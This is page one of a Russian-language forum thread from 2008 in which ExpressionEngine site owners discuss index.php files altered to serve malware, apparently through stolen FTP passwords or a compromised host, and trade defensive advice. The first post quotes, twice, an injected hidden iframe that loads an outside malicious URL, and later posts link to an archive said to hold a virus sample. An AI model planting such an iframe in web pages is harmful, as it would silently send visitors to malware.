Искать  
 
   
1 из 2
1
Замечены случаи хакерства на сайтах
Отправлено: 01 Август 2008 10:51 A.M.   [ Игнорировать ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

Недавно мой коллега, с кем мы делали один проект на сайте ЕЕ, сказал, что в индексном файле index.php в корневом каталоге прописан вредоносный код и подгружается какой то вирус. Тоесть файл изменен, в него были внесены изменения еще раз подчеркиваю.

Буквально позавчера мне сообщили что на одном из моих крупных сайтов также гуляет вирус. Заглянул, увидел, что в файле index.php прописано в самом низу

<iframe maosk='ORkmz4MH' ajrmi='ibhStmbH' src='http://veryblomar.com/vb/in.cgi?2 ' rgktd='W9EsBeJT'
 
leltd='vd6qB7Cy' ljfuf='1HYAaUdK' width='100' height='436' style='display:none'></iframe

также был обнаружен файл index.htm с аналогичным содержанием

<iframe maosk='ORkmz4MH' ajrmi='ibhStmbH' src='http://veryblomar.com/vb/in.cgi?2 ' rgktd='W9EsBeJT'
 
leltd='vd6qB7Cy' ljfuf='1HYAaUdK' width='100' height='436' style='display:none'></iframe

Возвращаясь к случаю с коллегой, он задавал вопрос хостеру и тот по логам посмотрел что доступ был по ФТП. В общем интересно, что же может такое происходить?

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 01 Август 2008 11:33 A.M.   [ Игнорировать ]   [ # 1 ]
Администратор
RankRankRankRank
Всего сообщений:  1354
Зарегистрирован  2008-01-02

ни на одном своем сайте такого не нашел, по информации в интернете внедрение происходит посредством доступа по фтп - тупо дописывают, а если нет, создают index файлы с вредоносным кодом. От CMS зависимости не обнаружено.
P.s. меняй пароли на ftp и проверь свой комп на трояны.
И для полноты картины конечно лучше писать хостеров, версии EE (если ты думаешь, что с этим связано) и т.п..

 Подпись 

booooring…

Профиль
 
 
Отправлено: 01 Август 2008 11:53 A.M.   [ Игнорировать ]   [ # 2 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

окей, буду разбираться, вполне возможно что из-за меня сайты хватанули вируса.
Но опять таки не понимаю, в этом может быть замешан SmartFTP?

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 02 Август 2008 03:59 P.M.   [ Игнорировать ]   [ # 3 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  891
Зарегистрирован  2008-01-07
mrtt - 01 Август 2008 11:53 A.M.

окей, буду разбираться, вполне возможно что из-за меня сайты хватанули вируса.
Но опять таки не понимаю, в этом может быть замешан SmartFTP?

есть трояны которые сразу из всех програм высилают пароли (SmartFTP, TotalComander, Opera, Qip….. и тд.)
у меня уже прывычка не сохранять пароли в программах, многие уже напамять знаю)))

Профиль
 
 
Отправлено: 12 Август 2008 06:17 P.M.   [ Игнорировать ]   [ # 4 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

опять не знаю как, но обнаружил на другом сайте измененный index.php
Прикрепляю его к сообщению, может кто глянет и скажет, что хотел злоумышленник. Вижу счетчик хотел поставить кто то.

Приложения с файлами
index.zip  (Размер файла: 3KB - Загрузок: 618)
 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 12 Август 2008 06:34 P.M.   [ Игнорировать ]   [ # 5 ]
Администратор
RankRankRankRank
Всего сообщений:  1354
Зарегистрирован  2008-01-02

не счетчик - редирект на сайта фейкового антивируса-трояна.
Способ заражения - либо через провайдера, либо у тебя опять пароль украли (ну или после прошлого раза не все пароли поменял).
Судя по инфе в нете - хит  прошлого месяца. поздно ты чего-то заметил....

 Подпись 

booooring…

Профиль
 
 
Отправлено: 12 Август 2008 07:12 P.M.   [ Игнорировать ]   [ # 6 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  891
Зарегистрирован  2008-01-07

может хостинг ломанули

Профиль
 
 
Отправлено: 29 Август 2008 05:12 P.M.   [ Игнорировать ]   [ # 7 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

блин *опа какая то

в каждом файле index.php который лежит на ка ждом каталоге на один уровень от корневого, включая корневой каталог, добавлено в конце следующее (см. прикрепленный файл)

Стоит у меня антивирусник, не видит никаких вирусов, все файлы (я храню локальную копию сайта) не затронуты, как можно проникать в эти файлы, что нужно ставить в настройках?

Пример вируса: http://eeclub.ru/virus_example.rar

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 29 Август 2008 05:32 P.M.   [ Игнорировать ]   [ # 8 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  891
Зарегистрирован  2008-01-07

ну я же говорю, может через соседние сайты на хостинге ломают, попробуйте для теста еще там другой движок поставить, друпал например

Профиль
 
 
Отправлено: 29 Август 2008 05:45 P.M.   [ Игнорировать ]   [ # 9 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

да нет времени ставить различные движки там

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 29 Август 2008 06:07 P.M.   [ Игнорировать ]   [ # 10 ]
Администратор
RankRankRankRank
Всего сообщений:  1354
Зарегистрирован  2008-01-02

требуй у хостера провести расследование - ссылки те же самые - на фиктивный антивир.
Какие настройки интересуют?

 Подпись 

booooring…

Профиль
 
 
Отправлено: 29 Август 2008 06:19 P.M.   [ Игнорировать ]   [ # 11 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

ну может как то листинг каталогов запретить, потому что не во всех каталогах такая зараза, такое впечатление что избирательно

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 29 Август 2008 06:26 P.M.   [ Игнорировать ]   [ # 12 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  891
Зарегистрирован  2008-01-07

ну и еще пусть хостер скажет с каких айпи было подключение по ФТП

Профиль
 
 
Отправлено: 29 Август 2008 06:31 P.M.   [ Игнорировать ]   [ # 13 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

дело осложняется, т.к. у хостера я на “птичьих” правах (

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 29 Август 2008 07:39 P.M.   [ Игнорировать ]   [ # 14 ]
Администратор
Avatar
RankRankRankRank
Всего сообщений:  1423
Зарегистрирован  2007-12-27

блин неужели smart ftp мой любимый имеет дырки?

 Подпись 

ExpressionEngine - SEO-ориентированный движок

Профиль
 
 
Отправлено: 29 Август 2008 07:54 P.M.   [ Игнорировать ]   [ # 15 ]
Администратор
RankRankRankRank
Всего сообщений:  1354
Зарегистрирован  2008-01-02
mrtt - 29 Август 2008 06:31 P.M.

дело осложняется, т.к. у хостера я на “птичьих” правах (

Так может тебя хостер ... ну того... ломает???

p.s. Без отчета хостера ты так долго сможешь гадать откуда идет утечка. По характеру распространения данного трояна с большей долей вероятности, что идет проникновение напрямик, либо с твоими паролями, или через хостера.
На смарт я бы не грешил (вроде он у тебя к тому же покупной?). Либо твои пароли каким-то образом снифят, либо (на что я бы ставил в случае спора), как сказал будулай - у тебя хостер дырявый. Можешь попытаться определить ресурсы, которые с тобой висят на одном хостинге(по ip) и навести справки у их владельцев.

 Подпись 

booooring…

Профиль
 
 
   
1 из 2
1